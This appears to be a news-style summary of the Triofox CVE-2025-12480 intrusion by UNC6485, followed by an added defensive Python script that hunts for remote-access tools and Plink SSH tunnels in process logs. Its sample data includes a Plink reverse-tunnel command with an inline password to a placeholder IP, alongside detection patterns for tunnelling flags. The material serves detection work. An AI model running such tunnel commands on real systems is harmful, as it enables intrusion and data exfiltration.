
Hackers Hijacked Antivirus Features to Install Malware - Here's What We Know
Why It Matters
The intrusion shows how a trusted security component can be turned into a launchpad for nation‑state‑linked espionage, and it underlines the need to patch third‑party software promptly: a fix had been available for about a month before the attack was observed. Delayed updates leave networks exposed to remote‑access malware and data theft.
Summary
Google Mandiant researchers disclosed a critical vulnerability (CVE‑2025‑12480, CVSS 9.1) in Gladinet's Triofox file‑sharing platform: an improper access control flaw that let the UNC6485 threat cluster hijack the product's built‑in antivirus feature and use it to install remote‑access tools such as Zoho Assist, AnyDesk, Plink and PuTTY. The flaw was introduced in early April 2025 and patched on July 26 in version 16.7.10368.56560, but the intrusion was observed roughly a month after the patch shipped, which points to delayed remediation on the victim side rather than a flaw unknown to the vendor at the time. Once inside, the attackers used the compromised server for lateral movement and set up SSH tunnels (Plink is PuTTY's command‑line SSH client) to facilitate data exfiltration. Gladinet released a newer version, 16.10.10408.56683, on October 14; organizations running Triofox should deploy it immediately.
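The tools named above (Zoho Assist, AnyDesk, Plink, PuTTY) are all legitimate software, so the useful detection signal is not their presence but their context: who launched them and, for Plink, whether the command line sets up a port‑forwarding tunnel. The following hunt script is an added example, not code from the article, from Mandiant or from Gladinet. It runs over constructed process‑creation records; the `key="value"` log format, the field names (`ts`, `host`, `user`, `image`, `cmdline`) and the binary name assumed for Zoho Assist are all assumptions, and real telemetry would come from Sysmon Event ID 1 or an EDR's process events.

```python
"""Hunt for remote-access tooling and Plink SSH tunnels in process-creation logs.

Added example, not part of the original article or of any vendor's code.
Log format, field names and the Zoho Assist binary name are assumptions.
"""
import re

# Binaries for the tools the article names. Image name alone is a weak
# indicator (admins use PuTTY too); the context checks below do the work.
REMOTE_ACCESS_TOOLS = {
    "plink.exe": "PuTTY Plink (scriptable SSH client)",
    "putty.exe": "PuTTY",
    "anydesk.exe": "AnyDesk",
    "zohoassist.exe": "Zoho Assist",  # assumed binary name
}

# Plink forwarding options. -R exposes a victim-side service (e.g. RDP on
# 3389) on the attacker's SSH server, which is the classic exfil/tunnel setup.
TUNNEL_FLAGS = {
    "-R": "reverse (remote-to-local) tunnel",
    "-L": "local port forward",
    "-D": "dynamic SOCKS proxy",
}

_KV = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Parse one constructed key="value" record into a dict."""
    return dict(_KV.findall(line))


def plink_tunnels(cmdline):
    """Return [(flag, spec), ...] for every forwarding option on a Plink command line."""
    return re.findall(r"(?:^|\s)(-[RLD])\s+(\S+)", cmdline)


def analyze_event(ev):
    """Return a finding dict for a remote-access tool execution, else None."""
    image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
    tool = REMOTE_ACCESS_TOOLS.get(image)
    if tool is None:
        return None
    finding = {
        "ts": ev.get("ts"), "host": ev.get("host"), "user": ev.get("user"),
        "tool": tool, "severity": "medium", "reasons": [f"execution of {tool}"],
    }
    cmd = ev.get("cmdline", "")
    if image == "plink.exe":
        for flag, spec in plink_tunnels(cmd):
            finding["reasons"].append(f"{TUNNEL_FLAGS[flag]} via {flag} {spec}")
            finding["severity"] = "high"
        if "-pw" in cmd.split():
            finding["reasons"].append("password passed on the command line")
        if re.search(r"\s-N(\s|$)", cmd):
            finding["reasons"].append("-N: no remote shell, tunnel-only session")
    # A remote-access tool started by SYSTEM (the context a hijacked
    # antivirus hook would give an attacker) is not routine admin use.
    if ev.get("user", "").upper().endswith("SYSTEM"):
        finding["reasons"].append("running as SYSTEM")
        finding["severity"] = "high"
    return finding


def analyze(lines):
    """Run analyze_event over raw log lines and return the findings in order."""
    events = (parse_event(l) for l in lines if l.strip())
    return [f for f in map(analyze_event, events) if f is not None]


# Constructed sample telemetry (hosts, users, paths and IPs are made up;
# 203.0.113.10 is a documentation-range address).
SAMPLE_EVENTS = [
    r'ts="2025-08-28T02:58:11Z" host="FILESRV01" user="CORP\jdoe" image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe"',
    r'ts="2025-08-28T03:11:02Z" host="FILESRV01" user="NT AUTHORITY\SYSTEM" image="C:\Windows\Temp\plink.exe" cmdline="plink.exe -ssh -N -R 3389:127.0.0.1:3389 -pw hunter2 svc@203.0.113.10 -P 443"',
    r'ts="2025-08-28T09:40:27Z" host="ADMIN-WS" user="CORP\jdoe" image="C:\Tools\putty.exe" cmdline="putty.exe"',
    r'ts="2025-08-28T03:15:44Z" host="FILESRV01" user="NT AUTHORITY\SYSTEM" image="C:\Windows\Temp\anydesk.exe" cmdline="anydesk.exe --install C:\ProgramData\AnyDesk --silent"',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['host']} {f['user']}: {f['tool']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

On the constructed input the Plink launch is flagged high both for the `-R 3389:127.0.0.1:3389` reverse tunnel and for running as SYSTEM, the administrator's interactive PuTTY session stays at medium, and the SYSTEM‑context AnyDesk install is high. In practice the tunnel regex should be paired with a parent‑process check, since whatever the hijacked antivirus feature spawned is the strongest single indicator.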